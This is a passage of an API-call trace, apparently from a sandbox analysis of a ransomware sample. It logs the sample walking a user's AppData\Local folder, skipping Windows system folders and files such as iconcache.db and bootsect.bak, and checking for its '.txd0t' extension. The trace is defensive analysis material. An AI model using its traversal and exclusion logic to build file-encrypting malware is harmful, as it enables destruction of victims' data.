lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.239] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Comms" [0119.240] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc58b9bba, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc58b9bba, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc58b9bba, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ConnectedDevicesPlatform", cAlternateFileName="CONNEC~1")) returned 1 [0119.240] StrCmpW (psz1="ConnectedDevicesPlatform", psz2=".") returned 1 [0119.240] StrCmpW (psz1="ConnectedDevicesPlatform", psz2="..") returned 1 [0119.240] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.240] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.240] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="ConnectedDevicesPlatform", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform") returned="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform" [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpSrch="\\windows\\system32\\") returned 0x0 [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpSrch="\\windows\\system\\") returned 0x0 [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\ConnectedDevicesPlatform" [0119.240] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xadb6a93, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4a3bd622, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x7e3bdb64, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0119.240] StrCmpW (psz1="Google", psz2=".") returned 1 [0119.240] StrCmpW (psz1="Google", psz2="..") returned 1 [0119.240] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.240] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.240] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Google", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Google") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Google" [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpSrch="\\windows\\system32\\") returned 0x0 [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpSrch="\\windows\\system\\") returned 0x0 [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Google" [0119.240] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0119.240] StrCmpW (psz1="History", psz2=".") returned 1 [0119.240] StrCmpW (psz1="History", psz2="..") returned 1 [0119.240] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd2e85042, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x13441, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0119.240] StrCmpW (psz1="IconCache.db", psz2=".") returned 1 [0119.240] StrCmpW (psz1="IconCache.db", psz2="..") returned 1 [0119.240] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.240] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.240] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="IconCache.db", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db") returned="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db" [0119.241] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0119.241] StrCmpW (psz1=".db", psz2=".txd0t") returned -1 [0119.241] StrCmpIW (psz1="IconCache.db", psz2="bootsect.bak") returned 1 [0119.241] StrCmpIW (psz1="IconCache.db", psz2="iconcache.db") returned 0 [0119.241] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0119.241] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0119.241] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0119.241] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.241] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.241] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Microsoft", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft" [0119.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system32\\") returned 0x0 [0119.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system\\") returned 0x0 [0119.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Microsoft" [0119.241] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a9a8d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc895324f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd6772beb, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0119.241] StrCmpW (psz1="MicrosoftEdge", psz2=".") returned 1 [0119.241] StrCmpW (psz1="MicrosoftEdge", psz2="..") returned 1 [0119.241] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.241] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.241] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="MicrosoftEdge", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge") returned="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge" [0119.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpSrch="\\windows\\system32\\") returned 0x0 [0119.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpSrch="\\windows\\system\\") returned 0x0 [0119.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.241] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\MicrosoftEdge" [0119.241] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9067e6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfa9067e6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x190eac40, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0119.241] StrCmpW (psz1="Mozilla", psz2=".") returned 1 [0119.241] StrCmpW (psz1="Mozilla", psz2="..") returned 1 [0119.241] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.241] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.241] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Mozilla", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla" [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpSrch="\\windows\\system32\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpSrch="\\windows\\system\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Mozilla" [0119.242] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfe87ff8e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfe87ff8e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0119.242] StrCmpW (psz1="Packages", psz2=".") returned 1 [0119.242] StrCmpW (psz1="Packages", psz2="..") returned 1 [0119.242] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.242] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.242] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Packages", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages" [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpSrch="\\windows\\system32\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpSrch="\\windows\\system\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Packages", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Packages" [0119.242] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdf9e1b08, ftLastWriteTime.dwHighDateTime=0x1d32734, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0119.242] StrCmpW (psz1="PeerDistRepub", psz2=".") returned 1 [0119.242] StrCmpW (psz1="PeerDistRepub", psz2="..") returned 1 [0119.242] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.242] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.242] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="PeerDistRepub", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub") returned="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub" [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpSrch="\\windows\\system32\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpSrch="\\windows\\system\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.242] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.243] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\PeerDistRepub" [0119.243] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2f421af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e09841, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0119.243] StrCmpW (psz1="Publishers", psz2=".") returned 1 [0119.243] StrCmpW (psz1="Publishers", psz2="..") returned 1 [0119.243] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.243] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.243] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Publishers", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers" [0119.243] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpSrch="\\windows\\system32\\") returned 0x0 [0119.243] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.243] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpSrch="\\windows\\system\\") returned 0x0 [0119.243] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.243] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.243] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Publishers" [0119.243] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f6a4d1, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0x501e95f1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1fb5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Resmon.ResmonCfg.txd0t", cAlternateFileName="RESMON~1.TXD")) returned 1 [0119.243] StrCmpW (psz1="Resmon.ResmonCfg.txd0t", psz2=".") returned 1 [0119.243] StrCmpW (psz1="Resmon.ResmonCfg.txd0t", psz2="..") returned 1 [0119.243] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.243] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.243] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Resmon.ResmonCfg.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg.txd0t" [0119.243] PathFindExtensionW (pszPath="Resmon.ResmonCfg.txd0t") returned=".txd0t" [0119.243] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.243] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3e62068a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x3e62068a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0119.243] StrCmpW (psz1="Temp", psz2=".") returned 1 [0119.243] StrCmpW (psz1="Temp", psz2="..") returned 1 [0119.243] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.243] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.243] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Temp", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp" [0119.243] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\windows\\system32\\") returned 0x0 [0119.243] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.243] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\windows\\system\\") returned 0x0 [0119.243] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Temp" [0119.244] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0119.244] StrCmpW (psz1="Temporary Internet Files", psz2=".") returned 1 [0119.244] StrCmpW (psz1="Temporary Internet Files", psz2="..") returned 1 [0119.244] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2fbd0ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3cdbf8a7, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0119.244] StrCmpW (psz1="TileDataLayer", psz2=".") returned 1 [0119.244] StrCmpW (psz1="TileDataLayer", psz2="..") returned 1 [0119.244] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0119.244] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0119.244] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="TileDataLayer", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer") returned="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer" [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\windows\\system32\\") returned 0x0 [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\windows\\system\\") returned 0x0 [0119.244] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\windows\\winsxs\\") returned 